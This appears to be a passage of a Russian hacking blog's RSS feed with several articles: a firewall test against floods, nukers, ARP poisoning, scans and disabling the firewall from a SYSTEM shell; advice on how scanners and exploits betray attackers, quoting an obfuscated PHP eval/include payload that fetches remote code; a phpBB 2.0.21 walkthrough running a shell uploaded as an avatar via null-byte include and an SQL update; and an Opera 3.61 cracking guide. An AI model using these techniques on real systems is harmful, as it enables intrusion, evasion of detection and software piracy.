*Касперский определяет флуд&#8230; и всё равно грузит проц.<br />
*Аутпост даже при стандартных настройках режет ICMP по самое не балуйся. Урезав всё вручную и оставив только необходимое он превратился в настоящую ICMP-крепость, которой до такого флуда просто пофиг. Респект.<br />
*Аларм был настроен на фильтрацию этих пакетов. Атака провалена.<br />
* IGMP-флудер<br />
*Без фаервола процессор грузился на 100%, однако система была работоспособна(приоритет IGMP низок).<br />
*Касперский не знает ничего об IGMP вообще и молчал. Процессор на 80%.<br />
*Outpost при первом включении обычно спрашивает, разрешать ли обработку IGMP. Нах. И так как IGMP был просто запрещен, проц &#8212; 50%.<br />
*Аларм был настроен на фильтрацию пакетов. Проц 35%.<br />
* UDP-флудер<br />
*Без фаерволов проц на 100%(приоритет удп выше чем тср) , система жутко тормозила, но (я оч удивлен) всё же выжила.<br />
*Касперский, как обычно всё распознал&#8230; и продолжал грузить процессор )))<br />
*Аутпост каким то неизвестным образом умудрялся противостоять натиску без блокировки.<br />
*Аларм как обычно молчал, не давая мне ни шанса ($ly ..!!!).</p>
<p>Теперь по-нюкаем</p>
<p>*Касперский опознал лишь LAND атаку &#8212; пожалуй единственную, которой подвержена ХР. Вобщем то можно сказать, что ставить фаервол от дяди каспера можно только на пропатченную ХР, так как если б это была другая винда &#8212; она свалилась бы без вопросов.<br />
*Аутпост как и было обещано опознал многие типы нюкеров. А вот с LAND как раз не справился.<br />
*По причине отсутствия детектора атак, Алармик был безмолвен. Если его ставить на старую систему, есть реальный шанс свалить её, при условии достаточно демократичных настроек фаервола.</p>
<p>Эксплоиты</p>
<p>Ну с DCOM&#8217;ом и Lsass&#8217;ом как оказалось, был знаком KAV и Outpost. А вот остальные сплоиты они видели явно впервые ) А ещё говорят, что если слегка переписать код эксплоита, то его ваще никто не замечает&#8230;</p>
<p>Снифер &#8212; тест</p>
<p>Теперь заценим новую фичу Аутпоста &#8212; защиту от отравления арп-кэша. Берём специальный снифер и травим кэш жертвы. Вот, без фаервола ВЕСЬ трафик между сервером и жертвой пошел через нас. А из него мы можем легко выловить пароли. Включаем Аутпост &#8212; тревожная табличка и все хакеры идут лесом ))).<br />
А так же обратим внимание на встроенный в Аутпост антиспайвэа-модуль, который призван находить в вашей системе разных шпионов. Фича полезная. Определила 3 из 3-х запущенных шпионских паблик-прог.<br />
Про огромную гору фишек в Аларме я рассказывать устану. Там их дофигища. Защита АРП-кэша имеется.</p>
<p>Сканим порты.<br />
Ну теперь &#8212; самое любимое ))</p>
<p>При сканировании нескольких портов каждый фаер сразу опознавал нарушителя, независимо от типа сканирования.</p>
<p>Теперь усложним задачу. Кто мешает нам посканить один порт? Прально. А если удасться, то через секунд 10 можно просканить и ещё один, и ещё&#8230;<br />
Сканить будем в два этапа. Оба &#8212; стелс-сканирование, первое поверхностное, второе &#8212; углубленное.</p>
<p>Скажу, что на поверхностном удалось просканить всех.</p>
<p>*Касперский показал неплохой результат, заблокировав хакера при начале углубленного скана.<br />
*Аутпост при стандартных настройках сканиться просто на ура. Однако слегка поднастроив детектор атак он показал отличный результат.<br />
*Аларм ничего не стал скрывать и устроил моему сканеру чистосердечное признание, сдав систему и сервисы с потрохами smile.gif))</p>
<p>Отключаем</p>
<p>Теперь просто и незатейлево пытаемся изменить настройки\отключить\деинсталировать фаервол и посмотрим его реакцию. Предположим, мы удаленно получили доступ к командной строке с привелегиями SYSTEM или Администратора. Из-за криво настроенного фаервола мы имеем сам доступ, однако нам этого мало и надо любой ценой устранить сетевой экран.</p>
<p>*Касперский абсолютно не возражал против отключения своего сервиса и убийства процесса. У него даже защиты паролем нет.<br />
*Аутпост был защищён паролем. Однако умер от простейшего тасккила с выгрузкой сервиса(можно сбацать сишную прогу с &#171;TerminateProcess&#187;)<br />
*Аларм послал меня куда подальше, вывел табличку с предупреждением. Мало того, он защищен паролем и от деинсталяции. Безупречно. Отключив таки сервис, загрузившись в безопасносном режиме, я снова потерпел неудачу.<br />
Оказывается, Аларм глубоко интегрируется в сетевые дровишки и при его несанкционированном отключении происходит полная блокировка сетевого трафика. Просто зверюга.</p>
<p>Кто здесь Лидер?</p>
<p>Ну вот. Чтож, могу сказать, что фаервол Касперского я бы назвал не Анти-Хакер, а Анти-Ламер ))) ибо защищает он лишь от них. Также использование его на системах, отличных от WinXP\SP2 будем иметь печальный итог. Тут уж я и не знаю кто кого и от кого защищает )).<br />
Меня сильно позабавил смачный глюк, когда несмотря на &#171;блокировку атакующего&#187; я таки смог определить открытые порты. Ето вери-вери бэд.</p>
<p>Аутпост показал неплохую устойчивость от различного вида атак. Огорчает его безразличие к флуду (однако айпи хакера можно легко посмотреть, открыв вкладку сетевой активности), но радует повышенная безопасность от сниферства, spy-детектор и гибкость настроек детектора атак (да и всех остальных модулей &#8212; оч. профессиональный подход). Почти некчему придраться.</p>
<p>Зон Аларм ваще зверь, но только при высоком уровне защиты. Видите ли, разработчики делали режимы фаервола в расчете на СТРАШНЫЙ Интернет и БЕЗОПАСНУЮ локальную сеть&#8230; Поэтому, если вам все надоели, вы хакер, единоличник, или агент FBI &#8212; ставьте Алармик и врубайте высокий режим защиты. Тогда достучаться до вас можно будет только через дверь.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-287/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Как подставляют сканнеры и эксплойты</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-286/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-286/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=594</guid>
		<description><![CDATA[Конечно же все мы когда либо пользовались сканнерами типа XSpider, LanSpy и т.д.. Так же большинство из нас пользуется эксплойтами которые пишут различные security-команды. При этом мы даже не задумываемся, или задумываемся совсем редко, о том, что сканнеры и эксплойты оставляют после себя огромную кучу следов, по которым Вас вычислить – дело часа, а то [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet294.jpg" alt="интернет" />Конечно же все мы когда либо пользовались сканнерами типа XSpider, LanSpy и т.д.. Так же большинство из нас пользуется эксплойтами которые пишут различные security-команды. При этом мы даже не задумываемся, или задумываемся совсем редко, о том, что сканнеры и эксплойты оставляют после себя огромную кучу следов, по которым Вас вычислить – дело часа, а то и минут 10. Сейчас я попытаюсь объяснить как именно Вас могут подставить эксплойты и сканнеры уязвимостей.</p>
<p>Для начала давайте рассмотрим сканнер безопасности XSpider. Безусловно, это лидер на рынке сканнеров безопасности. Но он создан именно для “открытого” сканирования. Самые первые следы могут быть найдены уже при начале сканирования – первым производится сканирование портов.<span id="more-594"></span> Оно производится в большое количество потоков, поэтому легко обнаружается файрволом, соответственно администратор может с лёгкостью обнаружить в лог-файлах файрвола Ваш IP. Но это ещё пол беды. Максимум что Вам могут сделать за сканирование – предупредить, либо в будущем отфильтровывать все запросы с Вашего IP-адреса (бан по IP).</p>
<p>Идём дальше – XSpider, при обнаружения какой либо службы, в которой присутствует авторизация (Telnet, FTP, POP3 и т.д.), начинает подбирать к ней пароль, что тоже чревато последствиями. По большому счёту при подборе пароля есть 2 варианта развития событий:</p>
<p>1. Таймаут<br />
2. Занесение попыток в логи</p>
<p>При первом варианте сервис обнаружает подбор пароля и на все, даже правильные, попытки авторизации начинает отказывать Вам в доступе. Соответственно администратору сообщается об этом.</p>
<p>При втором же варианте в логах появляется несколько сотен, а то и тысяч, строчек с попытками неверной авторизации, с промежутком в доли секунд, что явно указывает на подбор пароля. Это относится не только к XSpider, но и ко всем брутерам типа Brutus, Hydra и т.д..</p>
<p>Вот здесь  есть лог ftp-сервера к которому я подбирал пароль с помощью Brutus-AET2. При подборе использовались словари которые идут в комплекте с Brutus-AET2. (users.txt,words.txt). Подбор только по этим словарям добавил в логи ровно 1000 строчек. Тот же XSpider имеет словари которые больше в тысячи раз.</p>
<p>Далее проходит анализ веб-контента и CGI-сканирование. Анализ веб-контента страшен тем, что сканнер начинает обнаружать уязвимостями самыми пресловутыми способами – подставляя в параметры кавычки, AND 1=1/*, всяческие теги в поля для ввода и т.д. Любая IDS сразу начнёт визжать и выдаст огромный список попыток атак. Конечно, Вы можете сказать – “там же есть галочка “Маскировать от IDS””. Хочу Вас огорчить – эта галочка практически ничего не значит, более-менее нормально настроенная IDS всё равно обнаружит попытки атак. К тому же, даже если IDS не имеется, Вы загадите логи так, что любой Вася из 9 класса, за шоколадку держащий сервер, обнаружит факт CGI-сканирования.</p>
<p>Для того, что бы больше Вас убедить я просканировал свой веб-сервер XSpider`ом используя профиль HTTPAll, предварительно вычистив у веб-сервера все логии полностью. После CGI-сканирования логи стали весить 642(!) кб. Лог заполненный результатами работы XSpider Вы так же можете посмотреть здесь.<br />
Вот небольшой кусок из этого лога:</p>
<p>172.17.11.142 &#8212; - [21/Jan/2007:13:29:12 +0300] &#171;GET /nkpyuetjqhiarwwk.htm HTTP/1.1&#8243; 400<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:12 +0300] &#171;GET / HTTP/1.1&#8243; 302<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:12 +0300] &#171;GET /https-admserv/bin/index HTTP/1.1&#8243; 404<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:12 +0300] &#171;GET /Admin.po?proceed=yes HTTP/1.1&#8243; 404<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:13 +0300] &#171;GET /Admin/index.jsp HTTP/1.1&#8243; 200<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:13 +0300] &#171;GET /std.html HTTP/1.1&#8243; 404<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:13 +0300] &#171;GET /servlet/ServletManager HTTP/1.1&#8243; 404<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:13 +0300] &#171;GET /admin/contextAdmin/contextList.jsp HTTP/1.1&#8243; 200<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:14 +0300] &#171;GET / HTTP/1.1&#8243; 302<br />
172.17.11.142 &#8212; - [21/Jan/2007:13:29:14 +0300] &#171;PUT /PTNSSnnxam.txt HTTP/1.1&#8243; 405</p>
<p>Как видите – первые 4 запроса сделаны в 13:29:12 – 100% cgi-сканирование.<br />
Причём сканирование идёт со скоростью 4 запроса в секунду. На такую скорость сработает любая IDS. Ну и конечно же стоит упомянуть о том, что XSpider добавил своим сканированием 7068 строчек в лог-файл. Если Вы будете сканировать дохлый сайт какой ни будь компании, который посещают человека 2-3 в неделю (и то по ошибке), то Вы явно нарвётесь на неприятности. Самое лучшее, что можно сделать – сканировать/подбирать пароль через прокси. И то если Вы это сделаете, то будьте на 80% уверенны в том, что после Ваших действий Вас на той стороне уже будут ждать, а возможно и поменяют все пароли.<br />
Далее по списку (если используется профиль Default) идёт поиск уязвимостей в остальных сервисах – удалённые переполнения буфера, DoS и т.д.. И мало кто из начинающих читает предупреждения или Help сканнера. Вот вырезка из справки XSpider – “Иногда, при плохом качестве связи с проверяемым хостом возможно ложное определение DoS-уязвимости (когда связь с хостом прервалась случайно, а XSpider сделал вывод, что прошла DoS-атака).” – отсюда делаем вывод &#8212; если DoS-атака пройдёт, то сервер реально может откинуться, но если верить той же справке, то такое происходит в 40% случаев. Обратите внимание ещё на то, что при настраивании профиля там ясно указывается &#8212; обнаружение некоторых уязвимостей может плохо кончится для сервера.<br />
Ну, думаю что со сканнерами и с брутерами всё понятно. Давайте теперь перейдём к эксплойтам. Вы наверное ни раз уже пользовались ими. Но хоть один из Вас задумывался как они работают? Что они делают? Какие следы могут оставить? Я думаю что 70% читателей скажут “Нет”.<br />
Большой популярностью (по мнению автора) пользуются эксплойты к форумам. Как Вы наверное уже знаете – на большинстве форумов распознавание пользователей происходит с помощью сессий. Имена сессий представляют из себя обычный набор букв и цифр – никаких посторонних или опасных знаков. Каждый кто заходит на форум получает сессию даже если он не авторизирован. Вот пример обычного имени сессии:<br />
ab7bfc3f886270fd339dcce652fed1eb<br />
А в эксплойте для ipb2.1.6 от RST как имя сессии передаётся строка ipb216_for_IDS. Так же, в каком-то эксплойте, (точно уже не помню) имя сессии было IDS_i_am_exploit. И таких примеров множество. Если Вы хотя бы немного знаете об IDS, то Вы наверное в курсе того что базы IDS часто обновляются, соответственно в них есть записи о том как распознать эксплоит.<br />
Конечно же, IDS стоят не на всех веб-серверах, но это не спасёт Вас от вычисления в ~60% случаях использования эксплойтов. Возьмём, к примеру, эксплоит для IPB 2.1.5 от RST, который выполнял произвольные команды. Он создаёт топик называющийся justxpl, с примечанием justxpl justxpl. Топик содержит следующий текст:<br />
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116). chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100). chr(46).chr(114).chr(117).chr(47).chr(114).chr(53) .chr(55).chr(105). chr(112).chr(98). chr(105).chr(110).chr(99). chr(46). chr(116).chr(120).chr(116)))</p>
<p>Грамотный администратор сразу же поймёт в чём дело, а Вы лишний раз засветитесь.<br />
Вот вырезка из жалобы одного администратора провайдеру:<br />
“попытки взлома форума продолжаются – на этой неделе опять были созданы темы «justxpl». Автор лазит через прокси.”<br />
А эксплойты для удалённого переполнения буфера или повышения привилегий вообще не стоит использовать предварительно не проверив их работу хотя бы на виртуальной машине. Данные типы эксплойтов опасны тем, что могут делать далеко не то что обещают. В эксплойте может существовать и защита от дурака. Я слышал о множестве случаев когда запускали эксплоит, который (как в комментариях писалось) через уязвимость в определённом сервисе давал атакующему командную строку с привилегиями администратора, а получали полное вырубание сервиса или DoS всей машины.<br />
Эксплойты для поднятия привилегий через уязвимость в ядре вообще могут грохнуть ОС так, что придётся переустанавливать. А подумайте сами – за что дадут больше сроку: за то что Вы просто получили командную строку или за то что Вы убили ядро ОС и вывели сервер из рабочего состояния?<br />
Надеюсь после прочтения данной статьи многие задумаются и начнут перед атаками тестировать эксплойты на виртуальных машинах или локальном веб-сервере.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-286/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Поиск PHP уязвимостей на примере phpBB</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-285/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-285/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=593</guid>
		<description><![CDATA[Данная статья рассматривает способы подключения файлов в PHP скриптах, способы проверки данных, передаваемых в функции &#171;include&#187; и &#171;require&#187;, возможные случаи передачи данных в эти функции. Так же рассматриваются возможности подключения файлов &#171;сторонних&#187; производителей. В конце рассматривается возможность подключения файла загруженного как аватар. Статья преследует цель показать методику поиска и анализа мест, потенциально уязвимых для PHP-инъекций. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet293.jpg" alt="интернет" />Данная статья рассматривает способы подключения файлов в PHP скриптах, способы проверки данных, передаваемых в функции &#171;include&#187; и &#171;require&#187;, возможные случаи передачи данных в эти функции. Так же рассматриваются возможности подключения файлов &#171;сторонних&#187; производителей. В конце рассматривается возможность подключения файла загруженного как аватар. Статья преследует цель показать методику поиска и анализа мест, потенциально уязвимых для PHP-инъекций. Она будет интересна людям, делающим первые шаги на пути поиска и эксплуатирования ошибок в PHP приложениях, давая возможность проследить за ходом поиска уязвимых мест в скриптах, также будет интересна и программистам, показывая на примерах способы проверки данных и выявление неточности в логике построения проверок.<span id="more-593"></span> Для тестиования выбран форум phpBB 2.0.21, и перед тем как читать дальше я рекомендую установить этот продукт.</p>
<p>Поискав require и include во всех исходниках форума я нашел подключения различных файлов. Много подключений однотипных, например подключается файл так &#171;$phpbb_root_path . &#8216;includes/functions_validate.&#8217;.$phpEx&#187;, т.е. указание на директорию, которая в зависимости от расположения подключающего файла меняется, затем точное указание на файл, добавление к нему расширения. Скорее всего $phpbb_root_path создана для удобной возможности перемещения файла из одного каталога в другой, и изменение этой переменной позволит легко переопределить пути подключения файла. Изменение этой переменной привело бы к возможности удаленного инклюда. $phpEx определяет расширение PHP скриптов, связано это с тем, что WWW сервис определяет PHP скрипт по его расширению. На некоторых серверах возможны такие варианты как &#171;php3&#8243;,&#187;php5&#8243;,&#187;phtml&#187;.<br />
Итак, что же сделано для того чтобы никто не смог переписать эти переменные? В файлах, где переменная &#171;$phpbb_root_path&#187;и &#171;$phpEx&#187; не задается явно, стоит проверка определена ли константа IN_PHPBB, если нет, то скрипт умирает сообщая &#171;Hacking attempt&#187;. В файлах, где определяется эта константа, в самом начале определяются и эти две переменные $phpbb_root_path и $phpEx. Изменить эти переменные можно только если register_globals включен (по умолчанию он выключен), и программист забыл поставить проверку константы. Архитектурно неверно использовать подобные приемы, лучше всего жестко определять пути для подключаемых файлов, либо для определения пути использовать константы. Так же лучше всего определить фиксированное расширение для подключаемых файлов и выделить для них отдельный каталог, закрытый, например, с помощью .htaccess, от передачи оттуда файлов . Хотя такие решения с переменными дают возможность использовать данное приложение на различных WWW сервисах.<br />
Из друг на друга похожих икнлюдов выделяются и интересуют нас следующие:</p>
<p>в файле admin/admin_styles.php<br />
$phpbb_root_path. &#171;templates/&#187; . basename($install_to) . &#171;/theme_info.cfg&#187;<br />
$phpbb_root_path. &#171;templates/&#187; . $sub_dir . &#171;/theme_info.cfg&#187;<br />
в файле index.php<br />
&#8216;./&#8217; . $file<br />
в файле faq.php<br />
$phpbb_root_path . &#8216;language/lang_&#8217; . $board_config['default_lang'] . &#8216;/&#8217;<br />
. $lang_file . &#8216;.&#8217; . $phpEx</p>
<p>в файле includes/functions.php<br />
function init_userprefs &#8212; $phpbb_root_path . &#8216;language/lang_&#8217;<br />
. $board_config['default_lang'] . &#8216;/lang_main.&#8217; . $phpEx<br />
function init_userprefs &#8212; $phpbb_root_path . &#8216;language/lang_&#8217;<br />
. $board_config['default_lang'] . &#8216;/lang_admin.&#8217; . $phpEx<br />
function setup_style &#8212; $phpbb_root_path . $template_path . $template_name<br />
. &#8216;/&#8217;. $template_name . &#8216;.cfg&#8217;<br />
function message_die &#8212; $phpbb_root_path . &#8216;language/lang_&#8217;<br />
. $board_config['default_lang'] . &#8216;/lang_main.&#8217;.$phpEx</p>
<p>Файл admin/admin_styles.php<br />
include($phpbb_root_path. &#171;templates/&#187; . basename($install_to)<br />
. &#171;/theme_info.cfg&#187;);<br />
Переменная install_to берется из запроса GET или POST в чистом виде, что может привести к передаче в эту переменную любой информации. Переменная обрабатывается функцией &#171;basenamе()&#187; и поэтому данные вида &#171;/../../myScriptName&#187; обрежутся до &#171;myScriptName&#187;. Но можно передать строку &#171;myScript\x0&#8243; и тогда из папки templates подключится файл &#171;myScript&#187; , либо передать &#171;..&#187; и тогда если в корне форума существует theme_info.cfg, он подключится. Если его нет, то будет ошибка.<br />
Стоит добавить проверки, которые поставлены в рассматриваемом далее инклюде, он так же находится в этом файле<br />
. include($phpbb_root_path. &#171;templates/&#187; . $sub_dir<br />
. &#171;/theme_info.cfg&#187;);<br />
Расположенный вне проверок такой вызов функции позволил бы, передав в $sub_dir данные, запустить скрипт загруженный как аватар. В итоге полученная строка, переданная в include, выглядела бы так<br />
./../templates/../images/avatars/shell.jpg\x0/theme_info.cfg<br />
Но $sub_dir переменная, в которую поочередно передаются имена файлов и папок из каталога &#171;./../templates/&#187;, значит возможность передать спецсимволы исключена.Дальше идет проверка того, что бы переменная не являлась файлом или ссылкой, не была бы равна &#171;.&#187;, &#171;..&#187; и, как нестранно, &#171;CVS&#187;. После такой проверки, $sub_dir однозначно будет каталогом. Последняя проверка устанавливает факт существования &#171;theme_info.cfg&#187;. В итоге проникнуть можно либо создав свой каталог и поместив &#171;theme_info.cfg&#187;, либо изменить существующий &#171;theme_info.cfg&#187;.<br />
В исходнике admin/index.php был найден такой инклюд &#171;include(&#8216;./&#8217; . $file);&#187;. Выглядит инклюд очень заманчиво, но передать в него любые данные не получится, поскольку в $file, передаются имена файлов и каталогов из &#171;admin/&#187;. А затем происходит проверка preg_match(&#171;/^admin_.*?\.&#187; . $phpEx . &#171;$/&#187;, $file). Рассмотри алгоритм проверки: первым проверяется наличие в начале строки admin_, дальше может идти любое значение, заканчиваться строка должна .php. Действительно, &#171;^&#187; означает начало строки в которой осуществляется поиск и за началом следует &#171;admin_&#187;, отсутсвие утверждения о начале, приведет к тому, что &#171;admin_&#187; сможет находится везде, что приведет к подключению файла с именем &#171;mySTRING_admin_.php&#187;. &#171;$&#187; утверждает об окончании строки (или множества строк). На конце строки должен находится php. Без данного утверждения preg_match возвращал бы true даже в том случае, если имя файла было бы &#171;admin_.php.mySTRING&#187; . В принципе, существование директории &#171;admin_.php&#187; вызовет ошибку в работе скрипта. Можно было бы, добавить проверку на не директорию и не ссылку. Так как единственная возможность выполнить include с вредоносным кодом это записать этот файл в директорию &#171;phpBB2/admin&#187;, то я думаю следует ограничить эту директорию правами только чтение и запуск.<br />
Так же в &#171;faq.php&#187; замечен интересный инклюд<br />
include($phpbb_root_path . &#8216;language/lang_&#8217; . $board_config['default_lang']<br />
. &#8216;/&#8217; . $lang_file . &#8216;.&#8217; . $phpEx);<br />
$lang_file определятся однозначно либо как lang_bbcode, либо lang_faq . Остается переменная $board_config['default_lang']. Нужно проверить существует ли возможность ее перезаписи.<br />
В common.php так определяется $board_config:<br />
$sql = &#171;SELECT *<br />
FROM &#187; . CONFIG_TABLE;<br />
if( !($result = $db->sql_query($sql)) )<br />
{<br />
message_die(CRITICAL_ERROR, &#171;Could not query config information&#187;<br />
, &#171;&#187;, __LINE__, __FILE__, $sql);<br />
}</p>
<p>while ( $row = $db->sql_fetchrow($result) )<br />
{<br />
$board_config[$row['config_name']] = $row['config_value'];<br />
}<br />
То есть, если существует возможность SQL инъекции, то нападающий сможет изменить значение в таблице, тем самым установив значение $board_config['default_lang'], например, на файл аватара. Скрипт faq.php обламывает такие попытки функцией init_userprefs (includes/functions.php). В этой фунции есть проверка basename&#8217;ом. В связи с тем, что basename отсечет все попытки прорваться в другие каталоги с помощью конструкций вида /../../, то можно указать на файл находящийся в language и начинающийся lang_ и заканчивающийся &#171;\x0&#8243;.<br />
Как говорилось выше в функции init_userprefs происходит вызов basename($board_config['default_lang']), затем полученный результат передается в $default_lang, проверяется наличие файла для инклюда, если файл не существует, то $default_lang становится равным &#171;english&#187;. А перед вызовом include, $board_config['default_lang'] приравнивается $default_lang. В функции setup_style есть вот такое подключение файла<br />
($phpbb_root_path . $template_path<br />
. $template_name . &#8216;/&#8217; . $template_name . &#8216;.cfg&#8217;)<br />
&#171;$template_path&#187; определяется как &#8216;templates/&#8217; и с этим ничего нельзя сделать, но остается &#171;$template_name&#187;. В &#171;$template_name&#187; передаются данные из SQL запроса $row['template_name']. Значит при осуществлении SQL инъекции можно будет передать сюда все, что угодно. После инициализации переменной &#171;$template_name&#187; происходит вызов функции из класса Template, параметры, которые в неё передаются &#8212; ($phpbb_root_path . $template_path . $template_name). Затем проверяется значение, которое возвратила функция, а она возвращает ID объекта. И если посмотреть на функцию, то видно, что ей безразлично какие параметры передаются. А потому проверка расположенная перед инклюдом проходится спокойно. Создайте файл hack.php в папке includes и поместите туда такой код:<br />
<?
$phpbb_root_path = "./../";
$template_path = 'templates/';
$template_name = "../images/avatars/shell.jpg\x0";
include ("./template.php");
$template = new Template($phpbb_root_path . $template_path . $template_name);
if ( $template )
{
@include($phpbb_root_path . $template_path
. $template_name . '/' . $template_name . '.cfg');
}
?><br />
Видим, что оболочка, загруженная под видом аватара, запускается. Теперь найдем вызов функции &#171;setup_style&#187; в функции &#171;init_userprefs&#187;, так как я использовал установленный без различных модификаций и стилей форум, то я перед вызовом setup_style($board_config['default_style']) ставлю echo $board_config['default_style']; и получаю 1. Просмотрев SQL запрос на получение данных составляем запрос, который должен быть осуществлен за счет SQL инъекции &#171;UPDATE phpbb_themes SET template_name=/&#8217;../images/avatars/shell.jpg\x0&#8242; WHERE themes_id = 1;<br />
Инзменив таким образом $template_name мы получаем возможность загрузить вместо стиля по умолчанию наш скрипт, загруженный как аватар. Данная уязвимость работает (скорее всего) на всех версиях phpBB2 (я проверил на последней 2.0.21 и 2.0.10). Внеся такие изменения попробуйте теперь загрузить главную страницу и вы получите запуск &#171;shell.jpg&#187;.</p>
<p>Осталась функция message_die<br />
function message_die &#8212; $phpbb_root_path . &#8216;language/lang_&#8217;<br />
. $board_config['default_lang'] . &#8216;/lang_main.&#8217;.$phpEx<br />
Известно, что $board_config['default_lang'] в функции не изменяется, что можно переписать эту переменную SQL инъекцией. Задача найти вызов функции, где перед ее вызовом не объявляется константа HEADER_INC и первым параметром не передается CRITICAL_ERROR, а так же не вызывается перед message_die функция init_userprefs.<br />
И это уже задача, твоя, читатель</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-285/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Исследование защиты браузера Opera 3.61</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-284/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-284/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=592</guid>
		<description><![CDATA[Все нижесказанное, помеченное *, является моими советами в дизассемблировании в среде WinDasm. Сколько я не лазил в этой проге, не нашел, где генерируется рег. ключ, поэтому не отчаявшись (самое главное! никогда не бросать начатое!), я решил не обойти саму защиту, а сделать так, чтобы прога сама зарегистрировалась (хе-хе). Ломать будем в WinDasm v8.93, т.к. я [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet292.jpg" alt="интернет" />Все нижесказанное, помеченное *, является моими советами в дизассемблировании в среде WinDasm.<br />
Сколько я не лазил в этой проге, не нашел, где генерируется рег. ключ, поэтому не отчаявшись (самое главное! никогда не бросать начатое!), я решил не обойти саму защиту, а сделать так, чтобы прога сама зарегистрировалась (хе-хе).</p>
<p>Ломать будем в WinDasm v8.93, т.к. я считаю маловато про WinDasm в этих статьях сказано, а ведь<br />
такая вещица классная, многие с нее начинали. Многого знать не надо ну кроме базисов, вроде основные в статье Dr.Golova описаны.</p>
<p>TOOLZ:<br />
WinDasm 8.93, Hiew 6.11, Far (или NC), ну и самаOpera 3.61</p>
<p>Ну, вернемся к нашим бар.. Opera.</p>
<p>Заходим в браузер&#8230;<span id="more-592"></span> Мда непорядок, первое, что бросается в глаза &#8212; это &#171;unregistered&#187; вверху экрана, да и еще, если успели заметить, при загрузке идет Registered to : unregistered. Вот и начнем отсюда. Выходим из проги, заходим в Far( NC или что там у вас), в директории Opera, копируем файл opera.exe в opera.xxx и opera.w32</p>
<p>*Я советую использовать именно эти расширения, т.к. они являются наиболее удобными, где *.xxx &#8212; backup; *.w32 &#8212; этот файл мы будем дизассемблировать; а в opera.exe будем с помощью HIEW вносить изменения. Т.е. если что-нибудь запорем, то дорога в &#171;copy opera.xxx opera.exe&#187; ;))</p>
<p>Так, выходим из Far по Alt+Tab, т.к. он нам еще пригодится. Заходим в WinDasm и дизассемблируем файл opera.w32&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.. ;)))))))))))))))</p>
<p>*Следующий шаг &#8212; это просмотр SDR (т.е. String Data Reference), в меню Refs &#8212; последний пункт.</p>
<p>Здесь то мы и должны найти наш &#171;unregistered&#187;.</p>
<p>*Если прога объемная, как в этом случае с Оперой, то удобно будет скопировать все references кнопкой Copy All.</p>
<p>Ура нашли: String Resource ID=21428: &#187; (unregistered)&#187;, чтобы попасть в это место достаточно дважды щелкнуть по строке.</p>
